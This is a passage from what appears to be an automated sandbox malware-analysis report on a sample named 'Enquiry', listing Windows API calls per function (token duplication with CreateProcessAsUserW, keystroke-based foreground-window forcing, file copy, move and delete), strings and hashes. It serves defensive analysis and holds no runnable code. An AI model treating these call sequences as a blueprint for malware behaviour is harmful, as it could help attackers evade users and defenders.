                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • _memmove.LIBCMT ref: 00428939
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                            • String ID:
                            • API String ID: 620504543-0
                            • Opcode ID: c9c70bfe2459166c40d63b9fe27fba0aac42174d62b0a7f28c569f684cc4c908
                            • Instruction ID: c2064c2796ab03ff69418e3c62d92c7a192424b86f475a5c46dd96dfc8171558
                            • Opcode Fuzzy Hash: c9c70bfe2459166c40d63b9fe27fba0aac42174d62b0a7f28c569f684cc4c908
                            • Instruction Fuzzy Hash: 27011DB46005509FDB00DF5DD891F5677A1AF8A308F14819DE2098F366DA36E846CB92
                            APIs
                              • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                              • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                              • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                            • VariantClear.OLEAUT32(?), ref: 0047973E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$Clear$CopyInit
                            • String ID:
                            • API String ID: 24293632-0
                            • Opcode ID: 0a6f2c8fe72e55b9553011708fdcca806f77a23cbb8e20867b9cb7d7c1d06051
                            • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                            • Opcode Fuzzy Hash: 0a6f2c8fe72e55b9553011708fdcca806f77a23cbb8e20867b9cb7d7c1d06051
                            • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 0413D6F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1728586669.000000000413B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0413B000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_413b000_Enquiry.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: df9defd52a39272d2d5dad8417824a0a62d783e804fdcd03bc9e1c01ee5a0835
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: EAE0BF7494010D9FDB00EFA4D54969E7BB4EF04302F100561FD0192280D73099508A62
                            APIs
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                            • GetKeyState.USER32(00000011), ref: 0047C92D
                            • GetKeyState.USER32(00000009), ref: 0047C936
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                            • GetKeyState.USER32(00000010), ref: 0047C953
                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                            • _wcsncpy.LIBCMT ref: 0047CA29
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                            • SendMessageW.USER32 ref: 0047CA7F
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                            • ImageList_SetDragCursorImage.COMCTL32(00BA0308,00000000,00000000,00000000), ref: 0047CB9B
                            • ImageList_BeginDrag.COMCTL32(00BA0308,00000000,000000F8,000000F0), ref: 0047CBAC
                            • SetCapture.USER32(?), ref: 0047CBB6
                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                            • ReleaseCapture.USER32 ref: 0047CC3A
                            • GetCursorPos.USER32(?), ref: 0047CC72
                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                            • SendMessageW.USER32 ref: 0047CD12
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                            • SendMessageW.USER32 ref: 0047CD80
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                            • GetCursorPos.USER32(?), ref: 0047CDC8
                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                            • GetParent.USER32(00000000), ref: 0047CDF7
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                            • SendMessageW.USER32 ref: 0047CE93
                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,03231AA0,00000000,?,?,?,?), ref: 0047CF1C
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                            • SendMessageW.USER32 ref: 0047CF6B
                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                            • TrackPopupMenuEx.USER32(?,00000080,?,?,03231AA0,00000000,?,?,?,?), ref: 0047CFE6
                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F
                            • API String ID: 3100379633-4164748364
                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                            APIs
                            • GetForegroundWindow.USER32 ref: 00434420
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                            • IsIconic.USER32(?), ref: 0043444F
                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                            • SetForegroundWindow.USER32(?), ref: 0043446A
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 2889586943-2988720461
                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                            APIs
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                            • CloseHandle.KERNEL32(?), ref: 004463A0
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                            • GetProcessWindowStation.USER32 ref: 004463D1
                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                            • _wcslen.LIBCMT ref: 00446498
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • _wcsncpy.LIBCMT ref: 004464C0
                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                            • CloseDesktop.USER32(?), ref: 0044657A
                            • SetProcessWindowStation.USER32(?), ref: 00446588
                            • CloseHandle.KERNEL32(?), ref: 00446592
                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                            • String ID: $@OH$default$winsta0
                            • API String ID: 3324942560-3791954436
                            • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                            • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                            • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                            • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • _wcscat.LIBCMT ref: 0044BD94
                            • _wcscat.LIBCMT ref: 0044BDBD
                            • __wsplitpath.LIBCMT ref: 0044BDEA
                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                            • _wcscpy.LIBCMT ref: 0044BE71
                            • _wcscat.LIBCMT ref: 0044BE83
                            • _wcscat.LIBCMT ref: 0044BE95
                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                            • String ID: \*.*
                            • API String ID: 2188072990-1173974218
                            • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                            • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                            • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                            • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                            • FindClose.KERNEL32(00000000), ref: 00478924
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                            • __swprintf.LIBCMT ref: 004789D3
                            • __swprintf.LIBCMT ref: 00478A1D
                            • __swprintf.LIBCMT ref: 00478A4B
                            • __swprintf.LIBCMT ref: 00478A79
                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                            • __swprintf.LIBCMT ref: 00478AA7
                            • __swprintf.LIBCMT ref: 00478AD5
                            • __swprintf.LIBCMT ref: 00478B03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            • API String ID: 999945258-2428617273
                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                            • __wsplitpath.LIBCMT ref: 00403492
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcscpy.LIBCMT ref: 004034A7
                            • _wcscat.LIBCMT ref: 004034BC
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                            • _wcscpy.LIBCMT ref: 004035A0
                            • _wcslen.LIBCMT ref: 00403623
                            • _wcslen.LIBCMT ref: 0040367D
                            Strings
                            • _, xrefs: 0040371C
                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                            • Error opening the file, xrefs: 00428231
                            • Unterminated string, xrefs: 00428348
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                            • API String ID: 3393021363-188983378
                            • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                            • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                            • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                            • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                            • FindClose.KERNEL32(00000000), ref: 00431B20
                            • FindClose.KERNEL32(00000000), ref: 00431B34
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1409584000-438819550
                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                            • __swprintf.LIBCMT ref: 00431C2E
                            • _wcslen.LIBCMT ref: 00431C3A
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
